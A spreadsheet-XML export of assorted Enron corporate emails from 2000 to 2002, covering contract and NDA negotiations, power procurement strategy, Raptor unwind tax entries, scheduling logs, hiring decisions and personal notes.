Louise -- Could you review and approve the attached draft of the cover letter for the direct mail pack?  The letter will be sent under your name.  I will come by tomorrow to get your signature on a piece of paper.  We will scan it and print on the letter electronically.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
Kal_x000D_
_x000D_
_x000D_
 &lt;&lt; File: custletter_postlaunch.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 08:55:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.mcconnell@compaq.com'})</t>
  </si>
  <si>
    <t>"Art" new time/date</t>
  </si>
  <si>
    <t>_x000D_
Art  7:30 Thursday November 1_x000D_
_x000D_
We need to bring the old tickets to exchange them and furthermore, we need to be there at 7:00 to transact._x000D_
_x000D_
smooootch_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Fri, 11 Aug 2000 09:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.moore@enron.com'})</t>
  </si>
  <si>
    <t>VEPCO PPA.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a recent version of the VEPCO PPA, which is currently be _x000D_
revised.  Hope it is helpful._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 08/11/2000 04:31 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Nancy Wodka" &lt;nwodka@bracepatt.com&gt; on 08/07/2000 03:54:19 PM_x000D_
To: &lt;dutch_bumgardner@dom.com&gt;, &lt;john_mable@dom.com&gt;, _x000D_
&lt;heather.kroll@enron.com&gt;, &lt;kay.mann@enron.com&gt;, &lt;ozzie.pagan@enron.com&gt;, _x000D_
&lt;mjlafrat@mwbb.com&gt;, &lt;gary_edwards@vapower.com&gt;, &lt;jeff_l_jones@vapower.com&gt;_x000D_
cc: &lt;swanita_99@yahoo.com&gt; _x000D_
_x000D_
Subject: VEPCO PPA.DOC_x000D_
_x000D_
_x000D_
Attached is a further revision to the PPA,which, as always, remains subject _x000D_
to Enron's further review and comment.  Ignore the fact that the document is _x000D_
entitled "clean"; this is a blackline against the August 3 version._x000D_
_x000D_
 - CLEANVEP.DOC_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 05:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'alan.comnes@enron.com', 'mary.hain@enron.com', 'harry.kingerski@enron.com', 'susan.mara@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'skean@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Illustrative Portfolios</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  As you know, we're attempting to find a solution to the "reasonable _x000D_
review" morrass that's impeding utility forward contracting.  For that _x000D_
effort, we've worked with the Portland desk to pull together some educational _x000D_
materials to use with a subset of California stakeholders that's trying to _x000D_
devise a solution to California's melt down._x000D_
_x000D_
The attached graphs show 3 scenarios for the state as a whole.  _x000D_
1) "do nothing"  _x000D_
2) for 60% of IOU short position, split the amount 50-50 and 1cover half the _x000D_
amount with 10-year  fixed priced power and the other half with 5-year fixed _x000D_
priced power._x000D_
3) create a portfolio with a) 25% of short position covered by 10-year fixed _x000D_
priced power, b) 20% of short position covered by 5-year fixed price power, _x000D_
c) 15% covered by 1-year fixed price power, d) 20% covered by May-Sept _x000D_
fixed-price power, and e) 15% from the PX.  _x000D_
_x000D_
The term of each scenario is 5 years._x000D_
_x000D_
Because each is priced off our our curves, the average price is roughly _x000D_
equivalent for each of the three portfolios.  However, the graph shows (as _x000D_
one would expect) that exposure to price volatility is significantly higher _x000D_
under scenario 1 compared to 2 and 3._x000D_
_x000D_
The goal is to use the illustrative scenarios to persuade the industry that _x000D_
in the short run (i.e., immediately) the utilities should be permitted to buy _x000D_
a modest amount of power under 5 and 10 terms, and those purchases (if _x000D_
undertaken using a "DealBench-like" tool) ought to be "per se" reasonable._x000D_
_x000D_
If anyone has questions about it, or would like to discuss further, give a _x000D_
call at 415.782.7822._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 12/12/2000 12:54 PM -----_x000D_
_x000D_
	Stephen Swain@ECT_x000D_
	12/12/2000 12:38 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Portfolio file for distribution_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Mar 2002 13:15:01 -0800 (PST)</t>
  </si>
  <si>
    <t>steve</t>
  </si>
  <si>
    <t>I need steve's email address.  Do you have it?</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 11:35:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'matt_doggett@dell.com'})</t>
  </si>
  <si>
    <t>RE: ENRON ADMITS IT'S REALLY ARGENTINA</t>
  </si>
  <si>
    <t xml:space="preserve">I will be in this weekend for Mom and dad's 35 anniversary._x000D_
_x000D_
Matt Doggett_x000D_
Dell Sales Manager_x000D_
Email: matt_doggett@dell.com_x000D_
Phone: 800 901 3355 x 66311_x000D_
Order status...  http://wwwapp.us.dell.com/us/en/ordstat/index.asp_x000D_
Online support...  http://www.support.dell.com/_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Don.Baughman@enron.com [mailto:Don.Baughman@enron.com]_x000D_
Sent:	Monday, February 04, 2002 12:42 PM_x000D_
To:	Matt_Doggett@exchange.dell.com_x000D_
Subject:	RE: ENRON ADMITS IT'S REALLY ARGENTINA_x000D_
_x000D_
Congratulations!  That is FANTASTIC!  When is the date?  When will you next_x000D_
be in town?  I'll buy you a beer in celebration._x000D_
_x000D_
Take care,_x000D_
_x000D_
Don_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Matt_Doggett@Dell.com@ENRON_x000D_
   Sent:   Thursday, January 31, 2002 3:17 PM_x000D_
   To:     Baughman Jr., Don_x000D_
   Subject:  RE: ENRON ADMITS IT'S REALLY ARGENTINA_x000D_
_x000D_
   I'm engaged....._x000D_
_x000D_
_x000D_
   Just wanted you to know....._x000D_
_x000D_
_x000D_
   MD_x000D_
_x000D_
   Matt Doggett_x000D_
   Dell Sales Manager_x000D_
   Email: matt_doggett@dell.com_x000D_
   Phone: 800 901 3355 x 66311_x000D_
   Order status...  http://wwwapp.us.dell.com/us/en/ordstat/index.asp_x000D_
   Online support...  http://www.support.dell.com/_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   Baughman Jr., Don [mailto:Don.Baughman@enron.com]_x000D_
   Sent:   Thursday, January 31, 2002 11:18 AM_x000D_
   To:     Garcia, Miguel L.; Seely, Michael; Larkworthy, Carrie; Kinser,_x000D_
   John;_x000D_
   Errigo, Joe; Ballato, Russell; Choate, Jason; Hanse, Patrick; Burnett,_x000D_
   Lisa;_x000D_
   David Nobles (E-mail); Jeff Lenamon (E-mail); Joe Ebert (E-mail); Joe_x000D_
   Kuehler (E-mail); Kari Tracey (E-mail); Lalena Stavinoha (E-mail); Mark_x000D_
   Doggett (E-mail); Matt Doggett (E-mail); Mike Newman (E-mail); Patricia_x000D_
   Baughman (E-mail); Paul  Henry (E-mail); Randy Doggett (E-mail); Reagan_x000D_
   Marshall (E-mail); Reid Stavinoha (E-mail); Richard Hrabal (E-mail);_x000D_
   Robert_x000D_
   Pearson (E-mail); Scott Sims (E-mail); Scott Smith (E-mail); Scott_x000D_
   Tichavsky_x000D_
   (E-mail); Sean Patrick Tracey (E-mail); Shannon Tyer (E-mail); Travis_x000D_
   Baughman (E-mail); Wayne Herndon (E-mail); Will, Lloyd; Day, Smith L.;_x000D_
   King,_x000D_
   Jeff; Dorland, Chris_x000D_
   Cc:     mrjrhernandez@yahoo.com_x000D_
   Subject:     ENRON ADMITS IT'S REALLY ARGENTINA_x000D_
_x000D_
   This is hilarious!_x000D_
_x000D_
   DB_x000D_
_x000D_
   http://www.satirewire.com/news/0111/enron.shtml_x000D_
_x000D_
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t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 11:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'renee.alfaro@enron.com'})</t>
  </si>
  <si>
    <t>Re: Burns &amp; Roe</t>
  </si>
  <si>
    <t xml:space="preserve">Scott,_x000D_
_x000D_
Carlos Sole' is supporting Mitch and John's efforts relating to BPUB, ie, _x000D_
coal fired generation.  Any contracts for that effort should be coordinated _x000D_
through Carlos.  Carlos will assist with the coordination of the finance and _x000D_
accounting requirements.  Due to the complexity of the issues some lead time _x000D_
is necessary.  Unfortunately, there are no "forms" for generation projects _x000D_
(given accounting/finance requirements), or any assurance that a contract _x000D_
that worked a month ago will work now. _x000D_
_x000D_
My preference is that contracts not be sent to counterparties prior to ENA _x000D_
(or EECC) Legal review._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Renee Alfaro@ENRON_DEVELOPMENT_x000D_
04/10/2001 04:33 PM_x000D_
To: Scott Laidlaw/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Kay Mann/Corp/Enron@Enron, Bob Carter/HOU/ECT@ECT, Kathleen _x000D_
Carnahan/NA/Enron@Enron _x000D_
_x000D_
Subject: Burns &amp; Roe_x000D_
_x000D_
Scott,_x000D_
_x000D_
Please find attached below a copy of the Amendment 2 and Transmittal letter _x000D_
that I just sent to Burns &amp; Roe today as well as an electronic copy of their _x000D_
PSA Agreement.  Hard copies are in interoffice mail._x000D_
_x000D_
I am also attaching the latest standard Tasking Letter form for work being _x000D_
done for EECC.  If work is to be done for another Enron entity, an affiliate _x000D_
Tasking Letter for would be used.  Bart Clark has used the Tasking Letter _x000D_
form on an exception basis for Turbo Park projects; however, ENA needs to _x000D_
review the language within the Tasking Letter prior to execution to ensure _x000D_
that it conforms to the accounting requirements of off balance sheet _x000D_
financing.  You need to ensure that an ENA attorney has reviewed everything _x000D_
prior to your sending it out because one error in a contract could cause the _x000D_
entire project to be put on the balance sheet._x000D_
_x000D_
Let me know if you need anything else._x000D_
_x000D_
I am also copying those ENA attorneys which you mentioned were assisting with _x000D_
the Coal Initiative so that they have the opportunity to review and comment _x000D_
on this Agreement and how it relates to that project._x000D_
_x000D_
Renee Alfaro_x000D_
Phone: 713-646-7281_x000D_
Fax: 713-646-6158_x000D_
Email: ralfaro@enron.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 12:11:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.wilcott@enron.com'})</t>
  </si>
  <si>
    <t>FW: Raptor unwind tax accounting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Swafford, John  _x000D_
Sent:	Monday, October 08, 2001 5:59 PM_x000D_
To:	Caminos, Facundo_x000D_
Cc:	Fischer, Mary; Dewar, Donette; Locklear, Essie_x000D_
Subject:	FW: Raptor unwind tax accounting_x000D_
_x000D_
Facundo:   See the note below.   Please note that you will need to reverse the book loss recorded on the upper tier entities (Harrier, Roadrunner, Pronghorn and Grizzley) for the purchase of the lower tier entities in the amount of about $600 million.   In place of the reversal of the book loss, you should record a tax Schedule M to deduct the same (about $600 million) of interest expense.   I am working with Essie to determine which entities will report how much of the $600 million purchase price.   Thanks, John._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Locklear, Essie  _x000D_
Sent:	Monday, October 08, 2001 2:27 PM_x000D_
To:	Fischer, Mary; Ng, Mark_x000D_
Cc:	Swafford, John; Wilson, Danny_x000D_
Subject:	FW: Raptor unwind tax accounting_x000D_
_x000D_
FYI_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dewar, Donette  _x000D_
Sent:	Friday, September 28, 2001 2:54 PM_x000D_
To:	Locklear, Essie_x000D_
Cc:	Vasconcellos, Brent_x000D_
Subject:	Raptor unwind tax accounting_x000D_
_x000D_
Essie:_x000D_
_x000D_
The purpose of this message is to communicate to you, for co-ordination with the appropriate "MARC" personnel, the relevant facts of the transactions that closed on Friday, September 28, to unwind the Raptor structures.  As I likely will not return to the office until just at the time of September close, I thought it might make sense for you, with Brent's assistance, to make sure that the appropriate reporting personnel are notified of the tax adjustments that should be made to book these transactions._x000D_
_x000D_
Each of the "top tier" Raptor entities (Harrier, Roadrunner, Pronghorn, and Grizzly) "purchased" from LJM the membership interest that LJM owned in the "bottom tier" Raptor entities (Talon, Bobcat, Porcupine, and Timberwlf, respectively).  Harrier paid $6 mil, Roadrunner and Grizzly each paid $15 mil, and Pronghorn paid $1,000.  As a result of these transactions, the purchased entities became book consolidated with Enron. Also as a result of these transactions, a total book loss of around $600 mil was recorded (divided among the books of each one of the four structures).  _x000D_
_x000D_
For tax purposes, the purchasing and purchased entities are all disregarded entities of Enron Corp. (or EES, in the case of Pronghorn and Porcupine).  The repurchases are to be treated as merely a final payment made by Enron Corp. (or EES, as the case may be) on a contingent debt instrument.  Accordingly, the entire book loss should be reversed for tax, and instead an interest deduction recorded on the tax books of each purchasing entity for the amount that was paid to purchase the bottom tier entity.  For examply, Harrier will record an interest expense deduction for $6 mil.  _x000D_
_x000D_
We have not been told yet exactly how the book loss will be spread among the four structures, and whether it will be booked on the top tier or bottom tier entities' books.  Ron Baker likely will have an answer on this issue by the time you see this message.  _x000D_
_x000D_
Please leave me a voice mail if you need assistance before I return to the office on October 10.  Thanks! _x000D_
_x000D_
DMD_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 04:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Corrections for energy type</t>
  </si>
  <si>
    <t>Hi Kate can you please ch the energy type to Firm instead of CAISO Energy on _x000D_
deal 532921. _x000D_
_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fw: Britney</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry F Campbell/NA/Enron on 09/25/2000 _x000D_
09:39 AM ---------------------------_x000D_
_x000D_
_x000D_
"Karen Van Pelt" &lt;kvanpelt@flash.net&gt; on 09/23/2000 10:33:44 AM_x000D_
To: "Aaron Gregory" &lt;qeraser@rocketmail.com&gt;, "Angel Backes" _x000D_
&lt;angel.backes@la-z-boy.com&gt;, "Annette Brandes" &lt;speech25@aol.com&gt;, "Benjamin _x000D_
Hogan" &lt;muslstang@aol.com&gt;, "Bill Van Pelt" &lt;WVanpelt@aol.com&gt;, "Cathy Webb" _x000D_
&lt;tulsama@worldnet.att.net&gt;, "Cathy Webb (@school)" &lt;Webbca@TulsaSchools.org&gt;, _x000D_
"Cheryl G." &lt;revayg@yahoo.com&gt;, "Darrell Hickman" &lt;ashddh@aol.com&gt;, "Dave _x000D_
Welch" &lt;Welch_Dave@provalue.net&gt;, "Dennis Umeno" &lt;umenos@gte.net&gt;, "Gail Van _x000D_
Pelt" &lt;gmcvp1@aol.com&gt;, "Jane Ku" &lt;Janeku@ix.netcom.com&gt;, "Jill Danker" _x000D_
&lt;ljdanker@hotmail.com&gt;, "Julie &amp; Matt" &lt;MBoyce4961@aol.com&gt;, "Larry F _x000D_
Campbell" &lt;Larry_F_Campbell@enron.com&gt;, "Lesli and Ramzy" &lt;LSabbara@aol.com&gt;, _x000D_
"Matt Tedrow" &lt;mtedrow99@hotmail.com&gt;, "Michael Campbell" _x000D_
&lt;physics123@yahoo.com&gt;, "Mike Van Pelt" &lt;kingvp@aol.com&gt;, "Mitch Webb" _x000D_
&lt;tulsadad@att.net&gt;, "Natasha Pryse" &lt;npryse@hotmail.com&gt;, "Neely Shaw" _x000D_
&lt;neelyshaw@aol.com&gt;, "Rachelle Bennett" &lt;thefoxs@flash.net&gt;, "Scott Lanehart" _x000D_
&lt;Scottlanehart@hotmail.com&gt;, "Sumit Patel" &lt;stp19992000@yahoo.com&gt;, "Tim _x000D_
Campbell" &lt;a_marine@bellsouth.net&gt;, "Tonishia Van Pelt" &lt;vpsuny@aol.com&gt;, _x000D_
"Veronica Dare" &lt;veronica-dare@usa.net&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Fw: Britney_x000D_
_x000D_
_x000D_
?_x000D_
 - britneyspot.jpg_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 05:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Presentation at Alstom ESCA Meeting in Las Vegas</t>
  </si>
  <si>
    <t xml:space="preserve">Jim, I am not sure that this will attract the people we want to hear the _x000D_
message; however, I will hold back judgement until we discuss the strategy in _x000D_
more detail._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/02/2000 _x000D_
12:52 PM ---------------------------_x000D_
From: James D Steffes@ENRON on 09/30/2000 12:04 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Presentation at Alstom ESCA Meeting in Las Vegas_x000D_
_x000D_
Dave --_x000D_
_x000D_
Alstom ESCA is holding "Summit 2000" in Las Vegas Oct 16 - Oct 17.  The _x000D_
purpose of the meeting is to bring together people from throughout the _x000D_
industry to discuss key issues.  _x000D_
_x000D_
Alstom ESCA is a French company that builds EMS systems in the US.  They _x000D_
developed the EMS for Enron's control areas.  We are working with them on _x000D_
Project e-trans (the RTO software)._x000D_
_x000D_
The first panel in the am on Monday involves Re-regulation and Competition.  _x000D_
They would like someone from Enron to present and participate.  Right now, _x000D_
they have  Pacificorp and are trying to get someone from government in PA and _x000D_
CA.  The presentation / speech is 10 - 15 minutes followed by 30 minutes of _x000D_
Q&amp;A for the panel._x000D_
_x000D_
Do you have any interest in presenting?  This could be a good opportunity to _x000D_
deliver our message throughout the industry._x000D_
_x000D_
Please let me know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stacy.hardy@enron.com', 'marnie.lamb@enron.com', 'pam.becton@enron.com', 'brian.schwertner@enron.com', 'lisa.king@enron.com'})</t>
  </si>
  <si>
    <t>January Journal Entries</t>
  </si>
  <si>
    <t>Are any of you still holding posted journal entries from Jan. Close?  If so _x000D_
will you please let me know what companies they are.  This will be an FYI _x000D_
kind of thing for me incase any of the accountants come around looking for _x000D_
specific entries.  Thanks for your cooperation._x000D_
_x000D_
dd</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 14:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 3/2/01; HourAhead hour: 23;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 3/2/01; HourAhead hour: 23;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001030223.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 23 / Preferred:  20.00 / Final:  19.91)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: TOSCO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/2/01_x000D_
  UNIT_ID: UNCHEM_1_UNIT_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 23 / Preferred:   0.00 / Final:   1.18)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EES_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/2/01_x000D_
  UNIT_ID: BADLND_7_PL1X2_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 23 / Preferred:  29.00 / Final:  27.88)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ARCO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/2/01_x000D_
  UNIT_ID: CARBGN_6_UNIT 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 05:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nedre.strambler@enron.com'})</t>
  </si>
  <si>
    <t>Legal assistant Candidtaes</t>
  </si>
  <si>
    <t>Nedre:_x000D_
Per your request, here is what we have decided:_x000D_
_x000D_
1. Our 2 best candidates were Jackie McCoy and Samantha Boyd.  As I mentioned _x000D_
to you, Mark will be talking to HR about making an offer to Samantha Boyd but _x000D_
until she formally accepts, we don't want to lose Jackie or say anything to _x000D_
her._x000D_
_x000D_
2. We have passed on the following candidates:_x000D_
_x000D_
Stephanie Panus_x000D_
Patricia Slaughter_x000D_
Donald Duhon_x000D_
Debra Vincent_x000D_
_x000D_
_x000D_
Of this group, we may pass on to other groups that have expressed interest  _x000D_
to Mark Taylor in hiring for a non-legal position, the resumes of Stephanie _x000D_
Panus and Debra Vincent and certainly Jackie McKoy if Samantha accepts.  It _x000D_
would be helpful to know from you when these particular  passed over _x000D_
candidates have been notified so that we don't cause confusion if we send _x000D_
their resume elsewhere._x000D_
_x000D_
Also, do you have references for Samantha? _x000D_
_x000D_
Please call me if you need any additional information._x000D_
_x000D_
_x000D_
Carol</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 13:40:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Sabine's response to NDA</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
No executed NDA received._x000D_
 -----Original Message-----_x000D_
From: 	Greenberg, Mark  _x000D_
Sent:	Thursday, September 20, 2001 2:53 PM_x000D_
To:	Jones, Tana_x000D_
Subject:	FW: Sabine's response to NDA_x000D_
_x000D_
Tana -_x000D_
_x000D_
Do you have anything on this yet?  Please let me know._x000D_
_x000D_
Thanks._x000D_
_x000D_
Mark_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Diamond, Daniel  _x000D_
Sent:	Thursday, September 20, 2001 1:44 PM_x000D_
To:	Greenberg, Mark_x000D_
Subject:	RE: Sabine's response to NDA_x000D_
_x000D_
Did we ever get these back signed???_x000D_
_x000D_
-Dan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Greenberg, Mark  _x000D_
Sent:	Thursday, September 13, 2001 8:51 AM_x000D_
To:	'"Pearson, Ralph J Jr" &lt;pearsrj@texaco.com&gt;@ENRON'_x000D_
Cc:	Jones, Tana; Diamond, Daniel; 'davisrl@texaco.com'_x000D_
Subject:	RE: Sabine's response to NDA_x000D_
_x000D_
Ralph -_x000D_
_x000D_
I have attached for your final review and approval copies of the NDA - both redlined and clean.  The redlined version incorporates the changes that were last suggested in August and also reflects the item we discussed yesterday.  _x000D_
_x000D_
If these are acceptable, please advise me accordingly and I will have originals printed, signed by Enron and forwarded to Sabine for completion._x000D_
_x000D_
Thanks for your assistance._x000D_
_x000D_
Mark_x000D_
_x000D_
 &lt;&lt; File: sabine pipeline-eol (finalredlined9-13-01).doc &gt;&gt;                  &lt;&lt; File: sabine pipeline-eol (final9-13-01).doc &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Pearson, Ralph J Jr" &lt;pearsrj@texaco.com&gt;@ENRON [mailto:IMCEANOTES-+22Pearson+2C+20Ralph+20J+20Jr+22+20+3Cpearsrj+40texaco+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, September 12, 2001 4:02 PM_x000D_
To:	Greenberg, Mark_x000D_
Subject:	FW: Sabine's response to NDA_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Greenberg, Mark [mailto:Mark.Greenberg@enron.com]_x000D_
Sent: Wednesday, August 01, 2001 2:35 PM_x000D_
To: davisrl@texaco.com_x000D_
Cc: Diamond, Daniel; Jones, Tana; Shults, Bob; vasquik@texaco.com_x000D_
Subject: FW: Sabine's response to NDA_x000D_
_x000D_
_x000D_
Robyn -_x000D_
_x000D_
I have reviewed your comments on the NDA between our companies.  I have_x000D_
attached a revised version which incorporates your changes and reflects_x000D_
- as redlined - the additional changes I have made._x000D_
_x000D_
The language you initially provided for the end of Paragraph 1 (relating_x000D_
to notice prior to disclosure for legal process) was too restrictive as_x000D_
it would seem to require that the disclosing party either be able to_x000D_
obtain some proctective order or waive confidentiality prior to the_x000D_
receiving party being able to disclose the legally required information._x000D_
Since a legal requirement of disclosure is an exception to the_x000D_
non-disclosure and confidentiality provisions, a waiver of compliance_x000D_
with the agreement by the disclosing party would not be necessary._x000D_
_x000D_
Please review the attached at your convenience.  If these changes are_x000D_
acceptable, please advise me accordingly and I will arrange to have_x000D_
final agreements forwarded to your attention for signature by Sabine._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
Mark_x000D_
Ph: 713-345-8897_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Diamond, Daniel_x000D_
Sent: Wednesday, August 01, 2001 9:21 AM_x000D_
To: Shults, Bob; Jones, Tana; Greenberg, Mark_x000D_
Cc: Becker, Lorraine; Carter, Carl_x000D_
Subject: Sabine's response to NDA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vasquez-Brown, Indra K [mailto:vasquik@texaco.com]_x000D_
Sent: Wednesday, August 01, 2001 8:47 AM_x000D_
To: Diamond, Daniel_x000D_
Subject: FW: Reciprocal Confidentiality Agreement_x000D_
_x000D_
_x000D_
Here is the file from Robyn Davis._x000D_
_x000D_
 &lt;&lt;sabine pipeline-eol ralph revisions.doc&gt;&gt;_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Indra K. Vasquez~Brown, CPS_x000D_
J Texaco Natural Gas - N.A._x000D_
vasquik@texaco.com &lt;mailto:vasquik@texaco.com&gt;_x000D_
ph (713) 752-7721_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Davis, Robyn L_x000D_
Sent:	Friday, July 27, 2001 12:21 PM_x000D_
To:	Vasquez-Brown, Indra K_x000D_
Subject:	Reciprocal Confidentiality Agreement_x000D_
_x000D_
Indra, Bob Shulz with Enron will be calling to give you an e-mail_x000D_
address to_x000D_
send this document to.  I will be out of the office the rest of the day._x000D_
If_x000D_
you need me I will have cell phone with me._x000D_
_x000D_
_x000D_
Thanks_x000D_
Robyn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 sabine pipeline-eol ralph revisions.doc &lt;&lt; File: sabine pipeline-eol ralph revisions.doc &gt;&gt; _x000D_
 - sabine pipeline-eol (enron comments 8-01).doc &lt;&lt; File: sabine pipeline-eol (enron comments 8-01).doc &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 07:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'barry.tycholiz@enron.com', 'mark.whitt@enron.com'})</t>
  </si>
  <si>
    <t>Re: Indemnity Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">I just spoke with Krystal at Kern and John Stafford at Patina:_x000D_
Kern Legal will not finish reviewing until Monday.  At that time they will _x000D_
approve, revise, or reject the changes to the Assignment Agreement.  I _x000D_
reiterated that Enron is comfortable with the changes._x000D_
John Stafford is comfortable with Gerald's Indemnity Letter Agreement _x000D_
(below), but would strongly prefer to have the indemnity language _x000D_
incorporated into the Assignment Agreement itself, if it is possible in a _x000D_
timely fashion._x000D_
John indicated he would be willing to conference in with Gerald and Kern's _x000D_
attorney(s) first thing Monday morning if we felt it would be helpful._x000D_
Bottom line:  It looks like we can shut the door on this, one way or the _x000D_
other, on Monday morning._x000D_
_x000D_
_x000D_
Tyrell Harrison_x000D_
303 575 6478_x000D_
_x000D_
_x000D_
_x000D_
	Gerald Nemec@ECT_x000D_
	04/13/2001 10:58 AM_x000D_
		 _x000D_
		 To: Tyrell Harrison/NA/Enron@Enron, jstafford@patinaoil.com_x000D_
		 cc: Barry Tycholiz/NA/Enron@ENRON_x000D_
		 Subject: Indemnity Agreement_x000D_
_x000D_
Attached is a letter agreement which specifies ENA's indemnity obligations _x000D_
for Patina wrt the Kern Transport Agreement.  Please review and if acceptable _x000D_
print and execute along with the Kern River assignment form.  If you wish to _x000D_
discuss, please contact me at (713) 853-3512.  Thanks for your assistance._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 07:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ronald_brown@kne.com'})</t>
  </si>
  <si>
    <t>Re: FW: Trailblazer CA</t>
  </si>
  <si>
    <t xml:space="preserve">Ron,  Couple of comments.  _x000D_
 1.  Enitity Name - You noted that Trailblazer is a limited partnership.  The _x000D_
name should designate limited partnership in some form (e.g. Trailblazer _x000D_
Pipeline  Company, L.P.)  Also for an LP the General Partner will need to _x000D_
sign to make it binding.  The signature block should read as follows:_x000D_
_x000D_
  Trailblazer Pipeline Company, L.P._x000D_
   by its General Partner, __________________________x000D_
_x000D_
 2.  The limitation on consequential damages limits any remedy under this _x000D_
agreement.  The only types of damages in a situation like this is really   _x000D_
consequential.  I think it would benefit both parties to leave this _x000D_
limitation out of the agreement._x000D_
_x000D_
If you would like to discuss these issues, please contact me at (713) _x000D_
853-3512.  Thank You._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
